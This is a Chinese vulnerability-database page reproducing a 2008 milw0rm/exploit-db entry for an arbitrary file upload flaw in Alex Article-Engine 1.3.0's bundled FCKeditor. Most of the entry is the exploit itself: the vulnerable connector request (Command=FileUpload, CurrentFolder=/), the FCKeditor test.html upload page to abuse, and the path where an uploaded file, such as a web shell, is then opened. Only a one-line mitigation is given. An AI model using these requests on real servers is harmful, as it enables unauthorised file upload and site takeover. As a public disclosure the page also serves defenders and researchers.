Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056969 漏洞类型
发布时间 2008-11-19 更新时间 2008-11-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7158
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
########################################################################
#
#                        Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- how To use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.

####################
- Greets :
####################

THE.HACKER.ONE , Str0ke

####################

# milw0rm.com [2008-11-19]